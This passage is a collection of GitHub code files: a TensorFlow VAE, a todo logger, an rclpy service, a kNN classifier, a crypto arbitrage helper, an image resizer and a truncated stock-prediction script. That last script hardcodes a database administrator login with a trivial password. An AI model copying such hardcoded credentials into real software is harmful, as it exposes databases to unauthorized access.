tf.add_n(tf.get_collection(\"reg_loss\"))\n tf.scalar_summary(\"Reg_loss\", reg_loss)\n total_loss = tf.reduce_mean(KL_loss + entropy_loss) + FLAGS.regularization * reg_loss\n tf.scalar_summary(\"total_loss\", total_loss)\n train_op = train(total_loss, train_variables)\n\n sess = tf.Session()\n summary_op = tf.merge_all_summaries()\n saver = tf.train.Saver()\n summary_writer = tf.train.SummaryWriter(FLAGS.logs_dir, sess.graph)\n\n sess.run(tf.initialize_all_variables())\n ckpt = tf.train.get_checkpoint_state(FLAGS.logs_dir)\n if ckpt and ckpt.model_checkpoint_path:\n saver.restore(sess, ckpt.model_checkpoint_path)\n print (\"Model restored...\")\n\n for itr in xrange(MAX_ITERATIONS):\n batch_images, batch_labels = data.train.next_batch(FLAGS.batch_size)\n sess.run(train_op, feed_dict={images: batch_images})\n\n if itr % 500 == 0:\n entr_loss, KL_div, tot_loss, summary_str = sess.run([entropy_loss, KL_loss, total_loss, summary_op],\n feed_dict={images: batch_images})\n print (\n \"Step: %d, Entropy loss: %g, KL Divergence: 
%g, Total loss: %g\" % (itr, np.mean(entr_loss), np.mean(KL_div), tot_loss))\n summary_writer.add_summary(summary_str, itr)\n\n if itr % 1000 == 0:\n saver.save(sess, FLAGS.logs_dir + \"model.ckpt\", global_step=itr)\n\n def test():\n z_vec = sess.run(z, feed_dict={images: data.test.images})\n write_array = np.hstack((z_vec, np.reshape(data.test.labels, (-1, 1))))\n df = pd.DataFrame(write_array)\n df.to_csv(\"z_vae_output.csv\", header=False, index=False)\n\n test()\n\n\nif __name__ == \"__main__\":\n tf.app.run()\n","repo_name":"shekkizh/TensorflowProjects","sub_path":"Unsupervised_learning/MNIST_VAE.py","file_name":"MNIST_VAE.py","file_ext":"py","file_size_in_byte":6242,"program_lang":"python","lang":"en","doc_type":"code","stars":169,"dataset":"github-code","pt":"31"} +{"seq_id":"27692415411","text":"import os\nfrom datetime import datetime\nfrom pathlib import Path\n\nclass HistoryList:\n current_script_path = os.path.dirname(os.path.realpath(__file__))\n dev_script_path = \"/Users/bradley/Personal Projects/todo/src\"\n dev_history_path = \"./resources/history.txt\"\n live_history_path = \"/Users/bradley/bin/history.txt\"\n\n if current_script_path == dev_script_path:\n history_path = dev_history_path\n else:\n history_path = live_history_path\n\n if not Path(history_path).exists():\n file = open(history_path, \"w\")\n file.close()\n\n @classmethod\n def show(cls) -> None:\n with open(cls.history_path, \"r\") as todo_list:\n print(\"\\n#################\\n### HISTORY ###\\n#################\\n\")\n all_items = todo_list.readlines()\n for i in range(len(all_items)):\n formatted_item = all_items[i].strip()\n print(formatted_item)\n print(\"\\n\")\n\n @classmethod\n def add(cls, item: str, action: str) -> None:\n \"\"\"\n :param item: String, line to add to list.\n :param action: String, Action taken, ADDED, REMOVED, AMENDED.\n \"\"\"\n now = datetime.now()\n dt_string = now.strftime(\"%d/%m/%Y %H:%M:%S\")\n with open(cls.history_path, \"a\") as todo_list:\n todo_list.write(dt_string + \" \" + action.upper() + \" \\\"\" + item + \"\\\"\\n\")\n","repo_name":"brabli/todo-list","sub_path":"src/HistoryList.py","file_name":"HistoryList.py","file_ext":"py","file_size_in_byte":1388,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"29677697364","text":"import weakref\n\nfrom rcl_interfaces.msg import ParameterDescriptor\nfrom rcl_interfaces.msg import ParameterType\n\nfrom rclpy.impl.implementation_singleton import rclpy_implementation as _rclpy\nfrom rclpy.parameter import Parameter\nfrom rclpy.qos import qos_profile_services_default\nfrom rclpy.service import Service\nfrom rclpy.type_support import check_is_valid_srv_type\nfrom rclpy.validate_topic_name import TOPIC_SEPARATOR_STRING\n\nfrom type_description_interfaces.srv import GetTypeDescription\n\nSTART_TYPE_DESCRIPTION_SERVICE_PARAM = 'start_type_description_service'\n\n\nclass TypeDescriptionService:\n \"\"\"\n Optionally initializes and contains the ~/get_type_description service.\n\n The service is implemented in rcl, but should be enabled via parameter and have its\n callbacks handled via end-client execution framework, such as callback groups and waitsets.\n\n This is not intended for use by end users, rather it is a component to be used by Node.\n \"\"\"\n\n def __init__(self, node):\n \"\"\"Initialize the service, if the parameter is set to true.\"\"\"\n self._node_weak_ref = weakref.ref(node)\n node_name = node.get_name()\n self.service_name = 
TOPIC_SEPARATOR_STRING.join((node_name, 'get_type_description'))\n self._type_description_srv = None\n\n self.enabled = False\n if not node.has_parameter(START_TYPE_DESCRIPTION_SERVICE_PARAM):\n descriptor = ParameterDescriptor(\n name=START_TYPE_DESCRIPTION_SERVICE_PARAM,\n type=ParameterType.PARAMETER_BOOL,\n description='If enabled, start the ~/get_type_description service.',\n read_only=True)\n node.declare_parameter(\n START_TYPE_DESCRIPTION_SERVICE_PARAM,\n True,\n descriptor)\n param = node.get_parameter(START_TYPE_DESCRIPTION_SERVICE_PARAM)\n if param.type_ != Parameter.Type.NOT_SET:\n if param.type_ == Parameter.Type.BOOL:\n self.enabled = param.value\n else:\n node.get_logger().error(\n \"Invalid type for parameter '{}' {!r} should be bool\"\n .format(START_TYPE_DESCRIPTION_SERVICE_PARAM, param.type_))\n else:\n node.get_logger().debug(\n 'Parameter {} not set, defaulting to true.'\n .format(START_TYPE_DESCRIPTION_SERVICE_PARAM))\n\n if self.enabled:\n self._start_service()\n\n def destroy(self):\n # Required manual destruction because this is not managed by rclpy.Service\n if self._type_description_srv is not None:\n self._type_description_srv.destroy_when_not_in_use()\n self._type_description_srv = None\n\n def _start_service(self):\n node = self._get_node()\n self._type_description_srv = _rclpy.TypeDescriptionService(node.handle)\n # Because we are creating our own service wrapper, must manually add the service\n # to the appropriate parts of Node because we cannot call create_service.\n check_is_valid_srv_type(GetTypeDescription)\n service = Service(\n service_impl=self._type_description_srv.impl,\n srv_type=GetTypeDescription,\n srv_name=self.service_name,\n callback=self._service_callback,\n callback_group=node.default_callback_group,\n qos_profile=qos_profile_services_default)\n node.default_callback_group.add_entity(service)\n node._services.append(service)\n node._wake_executor()\n\n def _service_callback(self, request, response):\n return self._type_description_srv.handle_request(\n request, GetTypeDescription.Response, self._get_node().handle)\n\n def _get_node(self):\n node = self._node_weak_ref()\n if node is None:\n raise ReferenceError('Expected valid node weak reference')\n return node\n","repo_name":"ros2/rclpy","sub_path":"rclpy/rclpy/type_description_service.py","file_name":"type_description_service.py","file_ext":"py","file_size_in_byte":3917,"program_lang":"python","lang":"en","doc_type":"code","stars":215,"dataset":"github-code","pt":"31"} +{"seq_id":"10794101718","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn import cross_validation as cv\n\ndata = pd.read_csv('seeds_dataset.txt', delimiter = '\\t')\n\ndata.columns = ['1', '2', '3', '4', '5', '6', '7', '8']\n\nlabels = data['8']\ndimensions = data.ix[:,['1', '2', '3', '4', '5', '6', '7']]\n\ndef distance(p1,p2):\n return np.sum((p2-p1)**2)\n\ndef model(dimensions, labels, new_example):\n comp = []\n pred = []\n\n for e in range(len(new_example)):\n for i in range(len(dimensions)):\n comp.append(distance(dimensions[i], new_example[e]))\n \n smallest = (np.array(comp)).argmin()\n\n pred.append(labels[smallest])\n\n comp = []\n\n return pred\n\ndef folds(labels, dimensions):\n #stratified k-folds CV\n skf = cv.StratifiedKFold(labels, n_folds=10, shuffle = True)\n score = []\n \n for train_index, test_index in skf:\n X_train, X_test = dimensions.ix[train_index], dimensions.ix[test_index]\n Y_train, Y_test = labels.ix[train_index], labels.ix[test_index]\n X_train, 
X_test = X_train.as_matrix(), X_test.as_matrix()\n Y_train, Y_test = Y_train.as_matrix(), Y_test.as_matrix()\n \n prediction = model(X_train, Y_train, X_test)\n\n result = [prediction==Y_test]\n\n score.append(np.sum(result) / len(Y_test))\n\n score = np.array(score)\n\n print (score)\n\n print (np.mean(score))\n \ndef main():\n folds(labels, dimensions)\n \n \n","repo_name":"GiXxXx/Machine-Learning-Study","sub_path":"Ch2 Nearest Neighbor Classification with Statified KFold CV.py","file_name":"Ch2 Nearest Neighbor Classification with Statified KFold CV.py","file_ext":"py","file_size_in_byte":1471,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"29728016588","text":"\"\"\" Data organization \"\"\"\nimport cryp_api\nimport bitt_api\nimport polo_api\nimport jeol\n\nimport re\nfrom operator import itemgetter\n\n\"\"\" Returns\n exc = 'polo', 'bitt', 'cryp' => Exchange\n legend = ex: 'BTC!ETH' => Pair in our convention\n depth = ex: 5 => Depth in the orders book to check\n order_type = 'Bid', 'Ask' => type of order to check\n\"\"\"\ndef generic_get_order_book(exc, legend, depth, order_type, inverted):\n if exc == 'polo':\n order_book = polo_api.get_order_book(legend, depth, inverted)\n if exc == 'bitt':\n order_book = bitt_api.get_order_book(legend, depth, inverted)\n if exc == 'cryp':\n order_book = cryp_api.get_order_book(legend, depth, inverted)\n if inverted:\n if order_type == 'Bid':\n order_type = 'Ask'\n else:\n if order_type == 'Ask':\n order_type = 'Bid'\n gen_order_book = [order_book['currency'], order_book[order_type]]\n return gen_order_book\n\n\"\"\" Returns a dict with opportunities between 2 exchanges\n Input is output of api.get_data()\n\"\"\"\ndef compare_exc(exc1, exc2):\n depth = 10\n equiv_pairs = {}\n orders = {}\n for exc1_key in exc1.keys():\n if exc1_key != 'Exchange':\n split1 = sorted(re.split('-|_|/', exc1_key))\n legend1 = split1[0] + '!' + split1[1]\n for exc2_key in exc2.keys():\n if exc2_key != 'Exchange':\n split2 = sorted(re.split('-|_|/', exc2_key))\n legend2 = split2[0] + '!' 
+ split2[1]\n if legend1 == legend2:\n exc1_base = exc1[exc1_key][0]\n exc1_bid = exc1[exc1_key][2]\n exc1_ask = exc1[exc1_key][3]\n exc2_base = exc2[exc2_key][0]\n inverted = False\n if exc1_base == exc2_base:\n exc2_bid = exc2[exc2_key][2]\n exc2_ask = exc2[exc2_key][3]\n else:\n exc2_bid = (1 / exc2[exc2_key][3])\n exc2_ask = (1 / exc2[exc2_key][2])\n inverted = True\n if opp_check(exc1['Exchange'], exc2['Exchange'], exc1_bid, exc2_ask):\n equiv_pairs[legend1] = [exc1['Exchange'], exc2['Exchange'], False, inverted, exc1_key, exc2_key]\n else:\n if opp_check(exc2['Exchange'], exc1['Exchange'], exc2_bid, exc1_ask):\n equiv_pairs[legend2] = [exc2['Exchange'], exc1['Exchange'], inverted, False, exc2_key, exc1_key]\n\n for legend in equiv_pairs.keys():\n bid_exchange = equiv_pairs[legend][0]\n ask_exchange = equiv_pairs[legend][1]\n bid_inverted = equiv_pairs[legend][2]\n ask_inverted = equiv_pairs[legend][3]\n bid_pair = equiv_pairs[legend][4]\n ask_pair = equiv_pairs[legend][5]\n order_book = generic_get_order_book(bid_exchange, legend, depth, 'Bid', bid_inverted)\n bid = order_book[1]\n if len(bid) == 0:\n continue\n # print(\"%s: %s\" % (equiv_pairs[legend][0], order_book[0]))\n order_book = generic_get_order_book(ask_exchange, legend, depth, 'Ask', ask_inverted)\n ask = order_book[1]\n if len(ask) == 0:\n continue\n # print(\"%s: %s\" % (equiv_pairs[legend][1], order_book[0]))\n bid.sort(key=itemgetter(0), reverse=True)\n ask.sort(key=itemgetter(0), reverse=False)\n currency = order_book[0]\n orders[legend] = [bid, ask, currency, bid_inverted, ask_inverted, bid_pair, ask_pair, bid_exchange, ask_exchange]\n\n return orders\n\n\n\"\"\" Compare analysis\n\n\"\"\"\ndef create_orders(compare, considered_pairs):\n orders = {}\n for legend in compare.keys():\n if legend in considered_pairs:\n bid_list = compare[legend][0]\n ask_list = compare[legend][1]\n currency = compare[legend][2]\n bid_inverted = compare[legend][3]\n ask_inverted = compare[legend][4]\n bid_pair = compare[legend][5]\n ask_pair = compare[legend][6]\n bid_exchange = compare[legend][7]\n ask_exchange = compare[legend][8]\n i = 0\n j = 0\n order_vol = 0.0\n order_bid = 0.0\n order_ask = 0.0\n still_running = True\n while still_running:\n bid = bid_list[i]\n bid_price = bid[0]\n bid_vol = bid[1]\n ask = ask_list[j]\n ask_price = ask[0]\n ask_vol = ask[1]\n if opp_check(bid_exchange, ask_exchange, bid_price, ask_price):\n vol = min(bid_vol, ask_vol)\n if order_bid == 0.0:\n order_bid = bid_price\n else:\n order_bid = min(order_bid, bid_price)\n if order_ask == 0.0:\n order_ask = ask_price\n else:\n order_ask = max(order_ask, ask_price)\n order_vol += vol\n print('Order Bid: %.8f, Order Ask: %.8f, Order Vol: %.8f' % (order_bid, order_ask, order_vol))\n bid_list[i][1] -= vol\n ask_list[j][1] -= vol\n if bid_list[i][1] <= 0:\n if i == (len(bid_list) - 1):\n still_running = False\n else:\n i += 1\n else:\n if j == (len(bid_list) - 1):\n still_running = False\n else:\n j += 1\n else:\n still_running = False\n orders[legend] = [bid_exchange, bid_pair, order_bid, bid_inverted, ask_exchange, ask_pair, order_ask, ask_inverted, order_vol]\n return orders\n\n\n\n\n\"\"\" Profit calculation\n\n\"\"\"\ndef profit_calc(orders):\n total_profit = {}\n for legend in orders.keys():\n profit = 0.0\n i = 0\n j = 0\n # print('Legend: ' + legend)\n not_max_profit = True\n bid_list = orders[legend][0]\n ask_list = orders[legend][1]\n currency = orders[legend][2]\n # print('Bid List: ' + str(bid_list))\n # print('Ask List: ' + str(ask_list))\n # 
print('Currency: ' + currency)\n while not_max_profit:\n # print('Bid i: %d Ask j: %d' % (i, j))\n bid = bid_list[i]\n bid_price = bid[0]\n bid_vol = bid[1]\n # print('Bid: ' + str(bid))\n ask = ask_list[j]\n ask_price = ask[0]\n ask_vol = ask[1]\n # print('Ask: ' + str(ask))\n # print('%.8f > %.8f' % (bid_price, ask_price))\n if bid_price > ask_price:\n order_vol = min(bid_vol, ask_vol)\n # print('Order Vol: %.8f' % order_vol)\n # old_profit = profit\n # print('Profit: %.8f' % old_profit)\n profit += order_vol * (bid_price - ask_price)\n # print('Added: %.8f' % (profit - old_profit))\n bid_list[i][1] -= order_vol\n ask_list[j][1] -= order_vol\n # print('Bid List Updated: ' + str(bid_list[i][1]))\n # print('Ask List Updated: ' + str(ask_list[j][1]))\n if bid_list[i][1] <= 0:\n if i == (len(bid_list) - 1):\n not_max_profit = False\n else:\n i += 1\n else:\n if j == (len(ask_list) - 1):\n not_max_profit = False\n else:\n j += 1\n else:\n not_max_profit = False\n total_profit[legend] = [profit, currency]\n return total_profit\n\n\n\"\"\" Opportunity check\n\n\"\"\"\ndef opp_check(exc_bid, exc_ask, bid, ask):\n if exc_bid == 'polo' or exc_bid == 'cryp':\n fee_exc_bid = 0.002\n else:\n if exc_bid == 'bitt':\n fee_exc_bid = 0.0025\n if exc_ask == 'polo' or exc_ask == 'cryp':\n fee_exc_ask = 0.002\n else:\n if exc_ask == 'bitt':\n fee_exc_ask = 0.0025\n bid = bid / (1 + fee_exc_bid)\n ask = ask / (1 - fee_exc_ask)\n if bid > ask:\n return True\n else:\n return False\n\n\ndef create_considered_list(currencies):\n considered_pairs = []\n for i in range(len(currencies)):\n for j in range((i + 1), len(currencies)):\n considered_pairs.append(currencies[i] + '!' + currencies[j])\n considered_pairs.append(currencies[j] + '!' + currencies[i])\n return considered_pairs\n\n\ndef get_balances(orders):\n balances = {}\n for pair in orders.keys():\n balance = {}\n split_pair1 = pair.split('!')[0]\n split_pair2 = pair.split('!')[1]\n bid_exchange = orders[pair][0]\n ask_exchange = orders[pair][4]\n # print(pair, split_pair1, split_pair2, bid_exchange, ask_exchange)\n if bid_exchange == 'polo' or ask_exchange == 'polo':\n polo = polo_api.Polo(jeol.polo_1(), jeol.polo_2())\n balance1 = polo.return_balance(split_pair1)\n balance2 = polo.return_balance(split_pair2)\n balance['polo'] = [balance1, split_pair1, balance2, split_pair2]\n if bid_exchange == 'bitt' or ask_exchange == 'bitt':\n bitt = bitt_api.Bitt(jeol.bitt_1(), jeol.bitt_2())\n balance1 = bitt.return_balance(split_pair1)\n balance2 = bitt.return_balance(split_pair2)\n balance['bitt'] = [balance1, split_pair1, balance2, split_pair2]\n if bid_exchange == 'cryp' or ask_exchange == 'cryp':\n cryp = cryp_api.Cryp(jeol.cryp_1(), jeol.cryp_2())\n balance1 = cryp.return_balance(split_pair1)\n balance2 = cryp.return_balance(split_pair2)\n balance['cryp'] = [balance1, split_pair1, balance2, split_pair2]\n balances[pair] = balance\n return balances\n\n\ndef check_balances(balances, orders):\n return_bal = {}\n for pair in orders.keys():\n bid_exchange = orders[pair][0]\n bid_pair = orders[pair][1]\n bid_split_pair = re.split('-|_|/', bid_pair)\n bid_price = orders[pair][2]\n if bid_price <= 0:\n continue\n bid_inverted = orders[pair][3]\n ask_exchange = orders[pair][4]\n ask_pair = orders[pair][5]\n ask_split_pair = re.split('-|_|/', ask_pair)\n ask_price = orders[pair][6]\n if ask_price <= 0:\n continue\n ask_inverted = orders[pair][7]\n order_vol = orders[pair][8]\n bid_total = (1 / bid_price) * order_vol\n ask_total = ask_price * order_vol\n if bid_exchange == 
'cryp':\n if bid_inverted:\n bid_curr = bid_split_pair[1]\n else:\n bid_curr = bid_split_pair[0]\n else:\n if bid_inverted:\n bid_curr = bid_split_pair[0]\n else:\n bid_curr = bid_split_pair[1]\n if ask_exchange == 'cryp':\n if ask_inverted:\n ask_curr = ask_split_pair[0]\n else:\n ask_curr = ask_split_pair[1]\n else:\n if ask_inverted:\n ask_curr = ask_split_pair[1]\n else:\n ask_curr = ask_split_pair[0]\n if balances[pair][bid_exchange][1] == bid_curr:\n bid_balance = balances[pair][bid_exchange][0]\n else:\n if balances[pair][bid_exchange][3] == bid_curr:\n bid_balance = balances[pair][bid_exchange][2]\n if balances[pair][ask_exchange][1] == ask_curr:\n ask_balance = balances[pair][ask_exchange][0]\n else:\n if balances[pair][ask_exchange][3] == ask_curr:\n ask_balance = balances[pair][ask_exchange][2]\n # print(type(bid_balance), type(ask_balance))\n print('Bid balance: %.8f %s, Ask balance: %.8f %s' % (bid_balance, bid_curr, ask_balance, ask_curr))\n print('Bid total: %.8f %s, Ask total: %.8f %s' % (bid_total, bid_curr, ask_total, ask_curr))\n\n if bid_balance > bid_total and ask_balance > ask_total:\n return_bal[pair] = orders[pair]\n # return_bal[pair] = [bid_balance, bid_curr, ask_balance, ask_curr]\n return return_bal\n\n\n# def execute_orders(orders):\n# for pair in orders.keys():\n# bid_exchange = orders[pair][0]\n# bid_pair = orders[pair][1]\n# bid_price = orders[pair][2]\n# bid_inverted = orders[pair][3]\n# ask_exchange = orders[pair][4]\n# ask_pair = orders[pair][5]\n# ask_price = orders[pair][6]\n# ask_inverted = orders[pair][7]\n# order_vol = orders[pair][8]\n# polo = polo_api.Polo(jeol.polo_1(), jeol.polo_2())\n\n# if bid_exchange == 'polo':\n# if not bid_inverted:\n# polo.return_balance('BTC')\n\n\n","repo_name":"arashi17/python-polo","sub_path":"python/org_data.py","file_name":"org_data.py","file_ext":"py","file_size_in_byte":11318,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"71255614168","text":"import os\nimport argparse\nfrom PIL import Image, ImageOps, UnidentifiedImageError\n\nclass BulkImageProcessor: \n def __init__(self, paths) -> None:\n '''Takes in list of file path and/or directories. 
Process any images within them'''\n self.images = []\n for path in paths:\n if os.path.isfile(path):\n try:\n self.images.append(Image.open(path))\n except UnidentifiedImageError as e:\n print(f\"{path} is not an image file, skipping\")\n elif os.path.isdir(path):\n for filename in os.listdir(path):\n filepath = os.path.join(path, filename)\n if os.path.isfile(filepath):\n try:\n self.images.append(Image.open(filepath))\n except UnidentifiedImageError as e:\n print(f\"{filepath} is not an image file, skipping\")\n\n\n def resize(self, size):\n for i, image in enumerate(self.images):\n image = image.resize(size)\n self.images[i] = image\n\n\n def save(self, prefix, output_dir=None):\n if not output_dir:\n output_dir = \"output\"\n i = 0\n while os.path.exists(f\"{output_dir}-{i}\"):\n i += 1\n output_dir = f\"{output_dir}-{i}\"\n os.makedirs(output_dir)\n for i, image in enumerate(self.images):\n image_path = os.path.join(output_dir, f'{prefix}-{i}.png')\n if os.path.exists(image_path):\n raise Exception(f'File {image_path} already exists, will not overwrite')\n image.save(image_path)\n\n\n def colorize(self, rgb_color):\n colorized_images = []\n for img in self.images:\n grayscale_image = ImageOps.grayscale(img)\n color = rgb_color\n print(rgb_color)\n colorized_image = ImageOps.colorize(grayscale_image, black=\"black\", white=\"white\", mid=color)\n colorized_images.append(colorized_image)\n self.images = colorized_images\n\n def to_grayscale(self):\n grayscale_images = []\n for img in self.images:\n grayscale_image = ImageOps.grayscale(img)\n grayscale_images.append(grayscale_image)\n self.images = grayscale_images\n\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"Bulk Image Processor\")\n parser.add_argument('file_paths', type=str, nargs='+',\n help='List of file paths to process')\n parser.add_argument('-s', '--size', type=int, nargs=2,\n help='Size to resize images')\n parser.add_argument('-p', '--prefix', type=str,\n help='Prefix for the filename when saving images')\n parser.add_argument('-c', '--color', type=int, nargs=3,\n help='Color for the images to be changed into')\n parser.add_argument('-g', '--grayscale', action='store_true',\n help='Convert images to grayscale')\n\n \n args = parser.parse_args()\n\n bim = BulkImageProcessor(args.file_paths)\n if args.size:\n bim.resize(args.size)\n if args.color:\n bim.colorize(args.color)\n if args.grayscale:\n bim.to_grayscale()\n if args.prefix:\n bim.save(args.prefix)\n\n","repo_name":"C0nsumption/BIM-TheImageMonster","sub_path":"BulkImageProcessor.py","file_name":"BulkImageProcessor.py","file_ext":"py","file_size_in_byte":3320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"45107263066","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Aug 28 08:27:12 2018\r\n\r\n@author: Administrator\r\n\"\"\"\r\n\r\nfrom sklearn.ensemble import RandomForestClassifier\r\nimport pandas as pd\r\nimport numpy as np\r\nimport talib as ta\r\nimport calendar\r\nfrom datetime import timedelta,datetime\r\nimport pymssql\r\nimport seaborn as sns\r\n\r\nconn=pymssql.connect( #connect\r\n\tserver='192.168.0.28',\r\n\tport=1433,\r\n\tuser='sa',\r\n\tpassword='abc123',\r\n\tdatabase='rawdata'\r\n\t)\r\n\r\ndef get_stock_day(stock,start_date,end_date,freq = '1D'):\r\n\r\n SQL_code = \"S_INFO_WINDCODE=\"+\"\\'\"+stock+\"\\'\"\r\n\r\n SQL_date =\"TRADE_DT between \"+\"\\'\"+start_date+\"\\' and \\'\" + end_date+\"\\'\"\r\n\r\n SQL_price = \"select 
S_DQ_ADJOPEN,S_DQ_ADJHIGH,S_DQ_ADJLOW,S_DQ_ADJCLOSE,S_DQ_VOLUME,TRADE_DT from ASHAREEODPRICES where \"+SQL_code+' and '+SQL_date+' and S_DQ_VOLUME>0'\r\n\r\n price = pd.read_sql(SQL_price,conn,index_col='TRADE_DT')\r\n \r\n return price\r\n\r\ndef get_index_day(index,start_date,end_date,freq = '1D'):\r\n\r\n index_code2,index_code1 = index.split('.')\r\n\r\n SQL_code = \"scode1=\"+\"\\'\"+index_code1+\"\\' and scode2=\\'\"+index_code2+\"\\'\"\r\n\r\n SQL_date =\"ddate between \"+\"\\'\"+start_date+\"\\' and \\'\" + end_date+\"\\'\"\r\n\r\n SQL_price = \"select sclose,sopen,high,low,ddate from indexs_day where \"+SQL_code+' and '+SQL_date\r\n\r\n SQL_vol = \"select volumn,ddate from indexs_day where \"+SQL_code+' and '+SQL_date\r\n\r\n price = pd.read_sql(SQL_price,conn,index_col='ddate')\r\n \r\n close = price.sclose.resample(freq).last().dropna()\r\n \r\n open = price.sopen.resample(freq).first().dropna()\r\n \r\n high = price.high.resample(freq).max().dropna()\r\n \r\n low = price.low.resample(freq).min().dropna()\r\n \r\n vol = pd.read_sql(SQL_vol,conn,index_col='ddate')\r\n\r\n vol = vol.resample(freq).sum().dropna()\r\n \r\n price = pd.concat([close,open,high,low],axis=1)\r\n\r\n data = price.join(vol)\r\n \r\n return data\r\n\r\npool_dic={}\r\nu=set()\r\nuniverse=pd.read_excel('code.xlsx')\r\npool_dic[universe.index[0].strftime('%Y%m')]=universe.ix[0].tolist()\r\nfor i in range(1,len(universe)):\r\n if universe.index[i].month!=universe.index[i-1].month:\r\n pool_dic[universe.index[i].strftime('%Y%m')]=universe.ix[i-1].tolist()\r\n u=u.union(universe.ix[i-1].tolist())\r\nall_stock={}\r\nfor stock in u:\r\n SS=get_stock_day(stock,'2009-01-01','2018-08-01',freq='1D')\r\n \r\n MA = pd.DataFrame()\r\n for i in range(10,90,10):\r\n local_MA = ta.MA(SS.S_DQ_ADJCLOSE,timeperiod = i)\r\n local_MA.name = 'MA'+str(i)\r\n MA = pd.concat([MA,local_MA],axis=1)\r\n \r\n MACD1,MACD2,XX = ta.MACD(SS.S_DQ_ADJCLOSE)\r\n MACD = pd.concat([MACD1,MACD2],axis=1)\r\n ADX = ta.ADX(SS.S_DQ_ADJHIGH,SS.S_DQ_ADJLOW,SS.S_DQ_ADJCLOSE)\r\n ADXR = ta.ADXR(SS.S_DQ_ADJHIGH,SS.S_DQ_ADJLOW,SS.S_DQ_ADJCLOSE)\r\n aroondown,aroonup = ta.AROON(SS.S_DQ_ADJHIGH,SS.S_DQ_ADJLOW)\r\n ATR = ta.ATR(SS.S_DQ_ADJHIGH,SS.S_DQ_ADJLOW,SS.S_DQ_ADJCLOSE)\r\n Bupper,Bmiddle,Blower = ta.BBANDS(SS.S_DQ_ADJCLOSE)\r\n group1 = pd.concat([SS,MA,MACD,ADX,ADXR,aroondown,aroonup,ATR,Bupper,Bmiddle,Blower],axis=1)\r\n \r\n BOP = ta.BOP(SS.S_DQ_ADJOPEN,SS.S_DQ_ADJHIGH,SS.S_DQ_ADJLOW,SS.S_DQ_ADJCLOSE)\r\n CCI = ta.CCI(SS.S_DQ_ADJHIGH,SS.S_DQ_ADJLOW,SS.S_DQ_ADJCLOSE)\r\n CMO = ta.CMO(SS.S_DQ_ADJCLOSE)\r\n DEMA = ta.DEMA(SS.S_DQ_ADJCLOSE)\r\n DX = ta.DX(SS.S_DQ_ADJHIGH,SS.S_DQ_ADJLOW,SS.S_DQ_ADJCLOSE)\r\n EMA = ta.EMA(SS.S_DQ_ADJCLOSE)\r\n KAMA = ta.KAMA(SS.S_DQ_ADJCLOSE)\r\n MFI = ta.MFI(SS.S_DQ_ADJHIGH,SS.S_DQ_ADJLOW,SS.S_DQ_ADJCLOSE,SS.S_DQ_VOLUME)\r\n MOM = ta.MOM(SS.S_DQ_ADJCLOSE)\r\n RSI = ta.RSI(SS.S_DQ_ADJCLOSE)\r\n group2 = pd.concat([BOP,CCI,CMO,DEMA,DX,EMA,KAMA,MFI,MOM,RSI],axis=1)\r\n \r\n SAR = ta.SAR(SS.S_DQ_ADJHIGH,SS.S_DQ_ADJLOW)\r\n TEMA = ta.TEMA(SS.S_DQ_ADJCLOSE)\r\n TRANGE = ta.TRANGE(SS.S_DQ_ADJHIGH,SS.S_DQ_ADJLOW,SS.S_DQ_ADJCLOSE)\r\n TRIMA = ta.TRIMA(SS.S_DQ_ADJCLOSE)\r\n TRIX = ta.TRIX(SS.S_DQ_ADJCLOSE)\r\n group3 = pd.concat([SAR,TEMA,TRANGE,TRIMA,TRIX],axis=1)\r\n \r\n raw_ta = pd.concat([group1,group2,group3],axis=1)\r\n raw_ta=raw_ta.dropna()\r\n all_stock[stock]=raw_ta\r\nSS = get_index_day('000001.SH','2009-01-01','2018-08-01',freq='1D')\r\nreturn_rate=[]\r\nfor i in range(len(SS)-22):\r\n 
return_rate.append((SS.sclose[i+22]-SS.sclose[i])/SS.sclose[i])\r\nreturn_rate=return_rate+[np.nan]*22\r\nSS['return_rate']=return_rate\r\n\r\nstock_all=all_stock.copy()\r\n#stock_all['000001.SH']=SS\r\nfor key, value in stock_all.items():\r\n return_rate=[]\r\n for i in range(len(value)-22):\r\n return_rate.append((value.S_DQ_ADJCLOSE[i+22]-value.S_DQ_ADJCLOSE[i])/value.S_DQ_ADJCLOSE[i])\r\n return_rate=return_rate+[np.nan]*22\r\n value['return_rate_stock']=return_rate\r\n target=SS[['return_rate']].join(value,how='inner')\r\n label=[]\r\n for j in range(len(target)):\r\n if target.return_rate_stock[j]>target.return_rate[j]:\r\n label.append(1)\r\n else:\r\n label.append(0)\r\n value['label']=label\r\n del value['return_rate_stock']\r\n\r\nfor key,value in stock_all.items():\r\n value.index=pd.to_datetime(value.index)\r\n\r\ntrain=pd.DataFrame()\r\nfor key, value in pool_dic.items():\r\n for j in value:\r\n train=train.append(stock_all[j][key[4:]+'/1/'+key[:4]:key[4:]+'/'+str(calendar.monthrange(int(key[:4]),int(key[4:]))[1])+'/'+key[:4]])\r\ntrain=train.sort_index()\r\np={}\r\nfor i in range(len(universe)):\r\n if universe.index[i].month!=universe.index[i-1].month or i==0:\r\n df=pd.DataFrame()\r\n code=[]\r\n for j in pool_dic[universe.index[i].strftime('%Y%m')]:\r\n df=df.append(stock_all[j][universe.index[i].strftime(\"%m/%d/%Y\"):universe.index[i].strftime(\"%m/%d/%Y\")])\r\n if not stock_all[j][universe.index[i].strftime(\"%m/%d/%Y\"):universe.index[i].strftime(\"%m/%d/%Y\")].empty:\r\n code.append(j)\r\n df.index=code \r\n p[universe.index[i].strftime('%Y%m%d')]=df\r\n \r\n\r\ndraw=pd.DataFrame()\r\nhold_all=[]\r\nfor k in range(5):\r\n net_value=1\r\n pnl=[1]\r\n correct1=[]\r\n correct2=[]\r\n ind=[]\r\n hold={}\r\n for day in p.keys():\r\n n=net_value\r\n ind.append(day)\r\n if day!='20100104' and day!='20100201' and net_value>0:\r\n 